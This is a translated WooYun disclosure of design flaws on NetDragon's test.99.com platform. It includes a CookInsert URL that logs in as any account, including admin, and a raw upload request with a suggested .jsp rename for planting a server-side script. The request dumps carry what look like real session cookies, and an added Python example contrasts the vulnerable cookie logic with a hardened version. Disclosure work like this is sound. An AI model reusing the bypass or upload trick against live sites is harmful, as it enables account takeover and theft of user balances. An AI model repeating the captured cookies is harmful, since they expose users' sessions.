
Vulnerability summary

Defect ID: wooyun-2015-0157092

Title: Several design flaws in a Fujian NetDragon platform, combined, allow logging in as any user and spending other users' balances

Vendor: Fujian NetDragon (福建网龙)

Author: 路人甲

Submitted: 2015-11-30 17:04

Fixed: 2016-01-14 17:34

Published: 2016-01-14 17:34

Type: Design flaw / logic error

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-30: Details sent to the vendor, awaiting vendor handling
2015-11-30: Vendor confirmed; details disclosed to the vendor only
2015-12-10: Details disclosed to core white hats and domain experts
2015-12-20: Details disclosed to regular white hats
2015-12-30: Details disclosed to intern white hats
2016-01-14: Details disclosed to the public

Brief description:

Several design flaws combined allow logging in as any user and spending other users' balances

Detailed description:

[Screenshot: QQ截图20151130160810.png]


Address: http://test.99.com/
Normally, when a user visits a key page they are redirected to the login page,
for example: http://test.99.com/reportHome?inner=1
But I found that when a user logs in, the program sends a request to the server:
http://test.99.com/registeruser/CookInsert?userAccount=<your username>&inner=1
Its purpose appears to be writing the cookie.
So you only need to supply any userAccount (a username; if you enter a username that already exists) and you can see everything that user has done, such as which apps they tested and what the results were, and you can use that user's balance to test your own app.

http://test.99.com/registeruser/CookInsert?userAccount=admin&inner=1


After opening that link, it redirects automatically

[Screenshot: QQ截图20151130160810.png]


Note the top-right corner: logged in as admin

[Screenshot: QQ截图20151130161507.png]
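The CookInsert pattern described above, as an added example that is not the platform's code: a handler that writes the login cookie straight from the client-supplied userAccount, beside a hardened login that checks the password first and signs the cookie so the identity can be neither chosen nor edited on the client. The cookie shape (QATestin=userid=...&userForm=99U) follows the captured request; that CookInsert is what writes it is the author's observation, and the user store, salt and server secret are constructed for this example.

```python
import hashlib
import hmac
from typing import Optional

# Constructed sample data for this example; not the vendor's users, salt or key.
SERVER_SECRET = b"example-server-secret"
SALT = b"example-salt"
USERS = {"admin": hashlib.pbkdf2_hmac("sha256", b"admin-password", SALT, 100_000)}


def _parse(payload: str) -> dict:
    """Split 'k=v&k=v' into a dict."""
    return dict(p.split("=", 1) for p in payload.split("&") if "=" in p)


def cook_insert_vulnerable(user_account: str) -> dict:
    """Mirrors the reported flaw: the cookie is written from whatever userAccount
    the client sends, with no credential check, so anyone can pick the identity."""
    return {"QATestin": f"userid={user_account}&userForm=99U"}


def current_user_vulnerable(cookies: dict) -> Optional[str]:
    """The server then trusts the plain cookie value as the logged-in user."""
    return _parse(cookies.get("QATestin", "")).get("userid")


def _sign(payload: str) -> str:
    return hmac.new(SERVER_SECRET, payload.encode(), hashlib.sha256).hexdigest()


def login_hardened(user_account: str, password: str) -> Optional[dict]:
    """Issue the cookie only after the password verifies, and bind the identity
    to a server-side secret so the client cannot forge or edit it."""
    stored = USERS.get(user_account)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)
    if stored is None or not hmac.compare_digest(stored, candidate):
        return None
    payload = f"userid={user_account}&userForm=99U"
    return {"QATestin": f"{payload}|{_sign(payload)}"}


def current_user_hardened(cookies: dict) -> Optional[str]:
    """Reject any cookie whose signature does not match, including unsigned ones."""
    payload, _, sig = cookies.get("QATestin", "").rpartition("|")
    if not payload or not hmac.compare_digest(sig, _sign(payload)):
        return None
    return _parse(payload).get("userid")
```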

Proof of concept:

Let me try an account I just registered

[Screenshot: QQ截图20151130161642.png]


[Screenshot: QQ截图20151130161806.png]


[Screenshot: QQ截图20151130162458.png]


[Screenshot: QQ截图20151130162523.png]


I can now spend the balance of other people's accounts.
Another thing worth mentioning is the upload.

POST http://test.99.com/Upload/Upload?newName=20151130161726641 HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------cH2cH2Ef1KM7ei4ei4Ij5gL6GI3ei4
User-Agent: Shockwave Flash
Host: test.99.com
Content-Length: 611
Connection: Keep-Alive
Pragma: no-cache
Cookie: 0FF535D2-3733-4059-AA48-73EFB0DA00CE=376FC8AE-EA0A-4aa9-8CF8-BDCF086DAFE7=2015-11-30 10:50:52&43CB770B-ECB7-4262-9F28-474C756FA85C=70d4a8d4-8f66-485b-8e94-ee1fce775487&77A7D26A-7211-4b2a-A04A-1A3F9959F179=3701509273&BF191744-3205-4d76-B8FC-3E0387F7EEFE=d55e909c26e5e8d5ebfa345be7b09fc8; NDUserCenterLogin=8D86E0CC-3E73-4d40-B849-55E6E63F9A08=910436806&689CFFF9-7996-407d-A0DC-C834CE0B56A3=7EF92FB482E4EB2EE160B6A5DEFD1F5029D046F09C329EF6C1BF5679A18308A58D32B5CB7B152CE7&6ACA984D-8C96-4f45-9DE4-EABE9161375B=5B09E419049BB818BB6E0E7C6E8F5959F93E97C6A61551DF0718F6AE3F737504&C201DE9A-536B-428d-88E4-4F8665742D12=1586&89FDB445-D8D5-4d19-BC3A-D1EC2BFE68E1=20151130105247&8E533C9E-481D-4288-89B2-71F96380C540=2015-11-30 11:52:47&6E3A37BE-A0BD-4b9b-87A3-3323C3806ADD=1597710df36c165ce69efc4517f897bd; QATestin=userid=test&userForm=99U; CNZZDATA1255966092=569517393-1448870087-%7C1448870087; Hm_lvt_d2a8914c513a31a167eb34a53b6b69f8=1448850128,1448851539,1448871451; Hm_lpvt_d2a8914c513a31a167eb34a53b6b69f8=1448871537
------------cH2cH2Ef1KM7ei4ei4Ij5gL6GI3ei4
Content-Disposition: form-data; name="Filename"
1.apk
------------cH2cH2Ef1KM7ei4ei4Ij5gL6GI3ei4
Content-Disposition: form-data; name="fileext"
*.apk
------------cH2cH2Ef1KM7ei4ei4Ij5gL6GI3ei4
Content-Disposition: form-data; name="folder"
/YunFTP
------------cH2cH2Ef1KM7ei4ei4Ij5gL6GI3ei4
Content-Disposition: form-data; name="Filedata"; filename="1.apk"
Content-Type: application/octet-stream
------------cH2cH2Ef1KM7ei4ei4Ij5gL6GI3ei4
Content-Disposition: form-data; name="Upload"
Submit Query
------------cH2cH2Ef1KM7ei4ei4Ij5gL6GI3ei4--


Look at the newName parameter: what happens if it is changed to test.jsp, with an extension?

[Screenshot: QQ截图20151130162253.png]


A return value of 1 means the upload succeeded, 0 means it failed.
Unfortunately, I did not find the upload path or the site root.
One more thing: the encryption.
http://test.99.com/AdapterReport?taskid=RTUyMEZCRTg0RkVFQ0U1Qw%3d%3d
This is the encrypted value, but does the encryption process have to be done like this?

POST http://test.99.com/JiaMi/Encrypt HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://test.99.com/ReportHome/
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: test.99.com
Content-Length: 10
Connection: Keep-Alive
Pragma: no-cache
Cookie: 0FF535D2-3733-4059-AA48-73EFB0DA00CE=376FC8AE-EA0A-4aa9-8CF8-BDCF086DAFE7=2015-11-30 10:50:52&43CB770B-ECB7-4262-9F28-474C756FA85C=70d4a8d4-8f66-485b-8e94-ee1fce775487&77A7D26A-7211-4b2a-A04A-1A3F9959F179=3701509273&BF191744-3205-4d76-B8FC-3E0387F7EEFE=d55e909c26e5e8d5ebfa345be7b09fc8; NDUserCenterLogin=8D86E0CC-3E73-4d40-B849-55E6E63F9A08=910436806&689CFFF9-7996-407d-A0DC-C834CE0B56A3=7EF92FB482E4EB2EE160B6A5DEFD1F5029D046F09C329EF6C1BF5679A18308A58D32B5CB7B152CE7&6ACA984D-8C96-4f45-9DE4-EABE9161375B=5B09E419049BB818BB6E0E7C6E8F5959F93E97C6A61551DF0718F6AE3F737504&C201DE9A-536B-428d-88E4-4F8665742D12=1586&89FDB445-D8D5-4d19-BC3A-D1EC2BFE68E1=20151130105247&8E533C9E-481D-4288-89B2-71F96380C540=2015-11-30 11:52:47&6E3A37BE-A0BD-4b9b-87A3-3323C3806ADD=1597710df36c165ce69efc4517f897bd; QATestin=userid=人为马赛克&userForm=99U; CNZZDATA1255966092=2105390528-1448850179-http%253A%252F%252Ftest.99.com%252F%7C1448850179; Hm_lvt_d2a8914c513a31a167eb34a53b6b69f8=1448850128,1448851539; Hm_lpvt_d2a8914c513a31a167eb34a53b6b69f8=1448853165
input=5187


Passing the value directly like this to have it encrypted is completely unnecessary.

Fix recommendation:

Patch it

Copyright notice: when reposting, please credit 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-11-30 17:34

Vendor reply:

Thanks for your support

Latest status:

None yet